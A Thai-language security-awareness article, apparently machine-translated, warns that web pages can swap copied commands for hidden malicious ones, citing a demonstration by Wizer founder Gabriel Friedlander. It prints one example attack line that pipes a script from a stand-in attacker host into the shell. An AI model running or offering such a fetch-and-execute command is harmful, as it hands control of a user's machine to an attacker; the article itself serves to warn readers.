- เราทุกคนคัดลอกและวางจากอินเทอร์เน็ตทุกวันโดยไม่รู้ถึงความเสี่ยงที่แท้จริง
- ผู้เชี่ยวชาญด้านความปลอดภัยใช้เวลาในการแสดงให้ทุกคนเห็นถึงสถานการณ์ที่เลวร้ายที่สุดเมื่อทำเช่นนี้
- การวางคำสั่งที่คุณได้รับจากอินเทอร์เน็ตลงในเทอร์มินัลเป็นวิธีที่รวดเร็วในการถูกแฮ็ก
- คำสั่งที่คุณคิดว่าคุณกำลังวางลงในเทอร์มินัลของคุณเป็นรหัสที่เป็นอันตรายจริงๆ
เป็นความจริงที่เราอยู่ในยุคที่ความเร็วคือทุกสิ่ง และการได้ผลลัพธ์ที่รวดเร็วคือสิ่งสำคัญ อย่างไรก็ตาม มีเพียงไม่กี่คนที่หยุดคิดชั่วครู่และคิดถึงผลสะท้อนกลับ
ในแต่ละวัน โปรแกรมเมอร์ ผู้ดูแลระบบ และนักวิจัยด้านความปลอดภัยหลายล้านคนทำงานง่ายๆ เช่น การคัดลอกและวางคำสั่งจากหน้าเว็บลงในคอนโซลบนพีซีโดยตรง
แม้ว่าหลายคนจะไม่ได้คิดถึงเรื่องนี้ด้วยซ้ำ แต่ผลที่ตามมานั้นใหญ่กว่าและอันตรายกว่าที่คุณคิดในตอนแรก โดยเฉพาะอย่างยิ่งหากคุณกำลังจัดเก็บข้อมูลที่ละเอียดอ่อนหรือมีค่า
ผู้เชี่ยวชาญด้านความปลอดภัยที่มีชื่อเสียงใช้เวลาในการแบ่งปัน อะไรก็เกิดขึ้นได้ หากคุณคัดลอก+วางเนื้อหาจากหน้าเว็บ
Copy+Paste เป็นวิธีง่ายๆ ในการถูกแฮ็ก
กาเบรียล ฟรีดแลนเดอร์ ผู้ก่อตั้งแพลตฟอร์มฝึกอบรมการรับรู้ด้านความปลอดภัย Wizer ดึงหน้าปกออกจากโครงการที่จะทำให้คุณคิดทบทวนให้ดีก่อนคัดลอกและวางคำสั่งจากหน้าเว็บ
การคัดลอกและวางเนื้อหาจากอินเทอร์เน็ตกลายเป็นเรื่องธรรมดาในปัจจุบันจนไม่มีใครคิดเลย
อย่างไรก็ตาม Friedlander เตือนว่าหน้าเว็บบางหน้าหลอกลวงมากกว่าที่ใครจะคิดได้ในตอนแรก และสิ่งที่คุณคิดว่าคุณคัดลอกมาจากหน้าเว็บนั้นแตกต่างอย่างมากจากสิ่งที่คุณทำจริงๆ
และส่วนที่แย่กว่านั้นคือ หากไม่มีความรู้หรือคำแนะนำที่จำเป็น ผู้ที่ตกเป็นเหยื่อจะรับรู้ถึงความผิดพลาดของตนเองหลังจากวางข้อความ ซึ่งในตอนนั้นอาจสายเกินไปแล้ว
นักวิเคราะห์ด้านความปลอดภัยได้ออกแบบการทดสอบเล็กน้อยสำหรับผู้อ่านบล็อกของเขา เพื่อให้ผู้คนสามารถเข้าใจได้อย่างแท้จริงว่าการเปิดประตูโดยไม่เต็มใจสำหรับอาชญากรไซเบอร์นั้นง่ายเพียงใด
เขาให้คำสั่งที่ตั้งใจจะคัดลอก แต่ความจริงที่เกี่ยวข้องจะถูกเปิดเผยเมื่อคุณวางข้อความและดูสิ่งที่คุณแนะนำจริง ๆ ในการตั้งค่าของคุณเท่านั้น
หลังจากคัดลอกคำสั่งที่แสดงในภาพหน้าจอด้านบนแล้ว ผลลัพธ์ของการวางคำสั่งจะทำให้คุณตกใจ เพราะมันอยู่ไกลจากสิ่งที่คุณคิดว่าคุณกำลังทำซ้ำ
ขด http://attacker-domain: 8000/shell.sh | shนอกจากคำสั่งที่แตกต่างกันโดยสิ้นเชิงบนคลิปบอร์ดของคุณแล้ว อักขระขึ้นบรรทัดใหม่ (หรือส่งคืน) ที่ จุดสิ้นสุดหมายความว่าตัวอย่างข้างต้นจะดำเนินการทันทีที่วางลงใน Linux. โดยตรง เทอร์มินัล.
ดังนั้นคุณควรตระหนักมากขึ้นถึงสิ่งที่เกิดขึ้นจริงและถือว่าสิ่งนี้เป็นภัยต่อความปลอดภัยอย่างร้ายแรง เราไม่ได้บอกว่าทุกเว็บไซต์ซ่อนเนื้อหาที่เป็นอันตราย แต่ควรพิจารณาสิ่งนี้ด้วย
คุณเคยถูกแฮ็กจากการวางคำสั่งหลบ ๆ ลงในเทอร์มินัลของคุณหรือไม่? แบ่งปันประสบการณ์ของคุณกับเราในส่วนความคิดเห็นด้านล่าง
